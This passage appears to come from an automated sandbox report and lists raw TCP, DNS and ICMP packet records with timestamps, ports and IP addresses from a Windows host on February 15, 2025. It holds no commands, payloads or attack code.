                                        Feb 15, 2025 20:34:49.163089037 CET49751443192.168.2.4151.101.194.137
                                        Feb 15, 2025 20:34:49.163089037 CET49751443192.168.2.4151.101.194.137
                                        Feb 15, 2025 20:34:49.163153887 CET44349751151.101.194.137192.168.2.4
                                        Feb 15, 2025 20:34:49.163220882 CET49751443192.168.2.4151.101.194.137
                                        Feb 15, 2025 20:34:49.163798094 CET44349751151.101.194.137192.168.2.4
                                        Feb 15, 2025 20:34:49.163903952 CET49751443192.168.2.4151.101.194.137
                                        Feb 15, 2025 20:34:49.163918018 CET44349751151.101.194.137192.168.2.4
                                        Feb 15, 2025 20:34:49.163957119 CET44349751151.101.194.137192.168.2.4
                                        Feb 15, 2025 20:34:49.164021015 CET49751443192.168.2.4151.101.194.137
                                        Feb 15, 2025 20:34:49.164375067 CET49751443192.168.2.4151.101.194.137
                                        Feb 15, 2025 20:34:49.164402962 CET44349751151.101.194.137192.168.2.4
                                        Feb 15, 2025 20:34:49.166172981 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166378021 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166445971 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.166477919 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166564941 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166623116 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.166634083 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166745901 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166795015 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.166805983 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166906118 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.166968107 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.166977882 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167242050 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167300940 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.167309999 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167442083 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167496920 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.167505980 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167603016 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167658091 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.167666912 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167746067 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.167802095 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.167810917 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.168431997 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.168489933 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.168498039 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.168586016 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.168642998 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.168653011 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.168740034 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.168793917 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.168802977 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.210115910 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.210179090 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.210300922 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.210300922 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.210539103 CET49752443192.168.2.4104.17.24.14
                                        Feb 15, 2025 20:34:49.210572004 CET44349752104.17.24.14192.168.2.4
                                        Feb 15, 2025 20:34:49.465995073 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.466666937 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.466697931 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.468247890 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.468499899 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.468842983 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.468978882 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.469090939 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.469100952 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.522526026 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.540775061 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.551557064 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.551594019 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.553932905 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.554119110 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.555516005 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.555716038 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.555851936 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.555871964 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.596575022 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.599107981 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.599231005 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.599311113 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.599371910 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.599522114 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.599579096 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.599591970 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.599941015 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.600006104 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.600018024 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.600123882 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.600178957 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.600189924 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.603723049 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.603805065 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.603816032 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.603923082 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.604017019 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.604042053 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.644862890 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.686479092 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.686676025 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.686743975 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.686778069 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.686913013 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.686966896 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.686980009 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687115908 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687175035 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.687186956 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687513113 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687563896 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.687577963 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687712908 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687763929 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.687774897 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687891960 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.687954903 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.687966108 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.688466072 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.688520908 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.688532114 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.688649893 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.688704967 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.688715935 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.689321041 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.689384937 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.689394951 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.689513922 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.689560890 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.689570904 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.690102100 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.690160990 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.690177917 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.690448046 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.690511942 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.704811096 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.705075026 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:49.705142975 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.713366985 CET49753443192.168.2.4104.18.94.41
                                        Feb 15, 2025 20:34:49.713397026 CET44349753104.18.94.41192.168.2.4
                                        Feb 15, 2025 20:34:49.717298031 CET49754443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:49.717327118 CET44349754104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.169207096 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.169298887 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.169383049 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.169641972 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.169678926 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.653112888 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.655091047 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.655153036 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.657170057 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.657372952 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.657824039 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.657902002 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.657927990 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.658118963 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.705249071 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.705264091 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.752293110 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.916850090 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.917005062 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:50.917359114 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.918736935 CET49756443192.168.2.4104.16.2.189
                                        Feb 15, 2025 20:34:50.918777943 CET44349756104.16.2.189192.168.2.4
                                        Feb 15, 2025 20:34:51.481432915 CET44349739172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:34:51.481492996 CET44349739172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:34:51.481549025 CET49739443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:34:51.894877911 CET49739443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:34:51.894911051 CET44349739172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:34:54.653637886 CET4972380192.168.2.4199.232.214.172
                                        Feb 15, 2025 20:34:54.660059929 CET8049723199.232.214.172192.168.2.4
                                        Feb 15, 2025 20:34:54.660135984 CET4972380192.168.2.4199.232.214.172
                                        Feb 15, 2025 20:35:00.529855013 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:00.529943943 CET44349763188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:00.530234098 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:00.530350924 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:00.530381918 CET44349763188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.029869080 CET44349763188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.030229092 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.030292034 CET44349763188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.031892061 CET44349763188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.031985044 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.033129930 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.033162117 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.033217907 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.033231974 CET44349763188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.033298016 CET49763443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.033562899 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.033654928 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.033791065 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.034060955 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.034101009 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.529356956 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.529635906 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.529700041 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.531378984 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.531459093 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.532454014 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.532548904 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.532778025 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.532797098 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:01.569267988 CET44349745172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:01.569438934 CET44349745172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:01.569518089 CET49745443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:01.580863953 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:01.894870996 CET49745443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:01.894903898 CET44349745172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:02.266943932 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:02.267659903 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:02.267832041 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:02.267956018 CET49764443192.168.2.4188.114.97.3
                                        Feb 15, 2025 20:35:02.267997026 CET44349764188.114.97.3192.168.2.4
                                        Feb 15, 2025 20:35:02.292949915 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.293003082 CET44349766188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.293154001 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.293286085 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.293301105 CET44349766188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.791492939 CET44349766188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.791934013 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.791971922 CET44349766188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.794958115 CET44349766188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.795089006 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.795368910 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.795428991 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.795428991 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.795456886 CET44349766188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.795528889 CET49766443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.795864105 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.795952082 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:02.796029091 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.796201944 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:02.796241045 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:03.516374111 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:03.519803047 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:03.519865036 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:03.523863077 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:03.524065971 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:03.524296999 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:03.524442911 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:03.524487972 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:03.573101997 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:03.573132992 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:03.619941950 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:04.518594980 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:04.518697977 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:04.518774033 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:04.520006895 CET49767443192.168.2.4188.114.96.3
                                        Feb 15, 2025 20:35:04.520056009 CET44349767188.114.96.3192.168.2.4
                                        Feb 15, 2025 20:35:14.476125002 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:14.476217031 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:14.476558924 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:14.478514910 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:14.478596926 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:14.940891981 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:14.942724943 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:14.942786932 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:14.944431067 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:14.946521044 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:14.946619987 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:14.987540007 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:29.159682989 CET49743443192.168.2.4167.89.118.118
                                        Feb 15, 2025 20:35:29.159742117 CET44349743167.89.118.118192.168.2.4
                                        Feb 15, 2025 20:35:29.844711065 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:29.844806910 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:29.844947100 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:29.896879911 CET49769443192.168.2.4172.67.165.90
                                        Feb 15, 2025 20:35:29.896945000 CET44349769172.67.165.90192.168.2.4
                                        Feb 15, 2025 20:35:40.442615032 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:40.442645073 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:40.442703962 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:40.443207026 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:40.443223953 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:41.093924999 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:41.094425917 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:41.094440937 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:41.095205069 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:41.095602036 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:41.095684052 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:41.143816948 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:43.811887026 CET44349743167.89.118.118192.168.2.4
                                        Feb 15, 2025 20:35:43.811944008 CET44349743167.89.118.118192.168.2.4
                                        Feb 15, 2025 20:35:43.812364101 CET49743443192.168.2.4167.89.118.118
                                        Feb 15, 2025 20:35:43.896012068 CET49743443192.168.2.4167.89.118.118
                                        Feb 15, 2025 20:35:43.896075010 CET44349743167.89.118.118192.168.2.4
                                        Feb 15, 2025 20:35:51.013264894 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:51.013401985 CET44349830172.217.16.196192.168.2.4
                                        Feb 15, 2025 20:35:51.013448000 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:51.896065950 CET49830443192.168.2.4172.217.16.196
                                        Feb 15, 2025 20:35:51.896084070 CET44349830172.217.16.196192.168.2.4
                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 15, 2025 20:34:36.705672026 CET53568951.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:36.724251986 CET53593601.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:37.845155001 CET53652121.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:40.378592014 CET6099653192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:40.378730059 CET5447853192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:40.696803093 CET53544781.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:40.697434902 CET53609961.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:43.265341997 CET5638253192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:43.265512943 CET5922453192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:43.274408102 CET53592241.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:43.274924994 CET53563821.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:44.444955111 CET6382053192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:44.445399046 CET6502153192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:44.470021963 CET53650211.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:44.470722914 CET53638201.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:46.144181013 CET5795353192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:46.144622087 CET5778753192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:46.153994083 CET53579531.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:46.192157984 CET53577871.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:47.625988960 CET5780153192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:47.626121044 CET6443653192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:47.633181095 CET53578011.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:47.633307934 CET53644361.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:47.633553028 CET6476553192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:47.633832932 CET5307153192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:47.634933949 CET5431153192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:47.635121107 CET5773653192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:47.641371965 CET53647651.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:47.641843081 CET53543111.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:47.642153978 CET53530711.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:47.642648935 CET53577361.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:48.403486013 CET5808053192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:48.403697014 CET5579853192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:48.410582066 CET53580801.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:48.410737991 CET53557981.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:48.457967043 CET4963753192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:48.458221912 CET5455353192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:48.464711905 CET53496371.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:48.464768887 CET53545531.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:48.934983969 CET5189553192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:48.935132980 CET6143153192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:48.942409039 CET53518951.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:48.942670107 CET53614311.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:49.024163961 CET6410953192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:49.024491072 CET5226853192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:49.033453941 CET53641091.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:49.034516096 CET53522681.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:50.159159899 CET5883353192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:50.159409046 CET6341653192.168.2.41.1.1.1
                                        Feb 15, 2025 20:34:50.166584969 CET53588331.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:50.168483019 CET53634161.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:54.824907064 CET53566941.1.1.1192.168.2.4
                                        Feb 15, 2025 20:34:55.071959972 CET138138192.168.2.4192.168.2.255
                                        Feb 15, 2025 20:35:00.438548088 CET5016253192.168.2.41.1.1.1
                                        Feb 15, 2025 20:35:00.438549042 CET6162453192.168.2.41.1.1.1
                                        Feb 15, 2025 20:35:00.498707056 CET53616241.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:00.529318094 CET53501621.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:02.272708893 CET6117253192.168.2.41.1.1.1
                                        Feb 15, 2025 20:35:02.272824049 CET5945253192.168.2.41.1.1.1
                                        Feb 15, 2025 20:35:02.278600931 CET53541881.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:02.288419008 CET53611721.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:02.292615891 CET53594521.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:13.871573925 CET53645481.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:36.424271107 CET53611281.1.1.1192.168.2.4
                                        Feb 15, 2025 20:35:36.585423946 CET53570761.1.1.1192.168.2.4
                                        TimestampSource IPDest IPChecksumCodeType
                                        Feb 15, 2025 20:34:46.193715096 CET192.168.2.41.1.1.1c281(Port unreachable)Destination Unreachable
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
